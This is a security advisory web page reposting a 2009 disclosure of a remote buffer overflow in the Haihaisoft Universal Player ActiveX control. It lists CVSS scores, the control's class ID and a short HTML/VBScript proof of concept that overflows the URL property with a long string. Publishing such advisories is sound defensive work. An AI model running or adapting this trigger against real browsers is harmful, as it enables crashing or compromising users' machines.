Haihaisoft Universal Player ActiveX Control Remote Buffer Overflow

2009.12.09
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------- Haihaisoft Universal Player ActiveX Control Remote Buffer Overflow url: www.haihaisoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.net/ File: MyActiveX.ocx Ver.: 1.4.8.0 ProgID: MYACTIVEX.MyActiveXCtrl.1 Descr.: Haihaisoft Universal Player ActiveX Control Marked: RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Member: URL (other members could be vulnerable too) This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP3 with Internet Explorer 8 - -------------------------------------------------------------------- <object classid='clsid:1A01FF01-EA62-4702-B837-1E07158145FA' id='test'></object> <script language='vbscript'> buff = String(3540, "A") test.URL = "http://" + buff </script> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32) iQIcBAEBAgAGBQJLE38TAAoJEGLxkZuDw5+s86QP/3pQnW0jVj0s/Oc8QVswPbpG JF2hCsLNkf+qz6QnhGTiAQyImpESgbOOjo6+UN8e5meCasuRlhAF8VdQObeAAEBM oSWMW9GpaqBLfkFKa94WpFG4h+eLsHRHHV83uTYI4z6Dl7j5igPKf59ciMbS1rJa hZ2eHhU6fZi049WIUGP8XmCuBbSEZFD6zbrontVNYsaJlQTX5cdb4ay9wHj0xGSF wIv8Ux1FIiS5ToUAyMMAX2IZcN5GIE3qmEkewiwsVKzQDlAD0uampMkIssb3s4r5 /Stdc5dTpHWiOf9jp3g7/Xhv8pyFPm52Ru1s9BoxlQu62nPAc+G4yXF5+yMWMzFb XDCPH0I37pWUGJ8AIg0gzZxC2IvBPDgXC7MKRohuN391CZtDBMC6jMnpGWw898At 2BZNoLYJF32RsYM9dFT47DWWrN2ag1gx7i6dMTh8W/FWC29TFEiH28hpDbUHme1b FwWQjtAzPNC1M0eTvnpW7zQ2ckwE+9ARUe590TdoFAIxNnIyyLe3pvQGSxos7MkM x+O7YB8qnJcr7hoEvWONoneng5UVKq1JFZ1hk0GxDIgTtxXHf7VicCjF9mZLCCKe YpbdIy5ukF+/ZNj1c7IdoaHHhGmOITYyQgUxWoF6Z6WGdOgMmCuf+TbzDnfhV7Mj 2uODdURsFLXuYUkEP9Zo =Wwmo -----END PGP SIGNATURE-----

References:

http://www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
http://secunia.com/advisories/37509


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top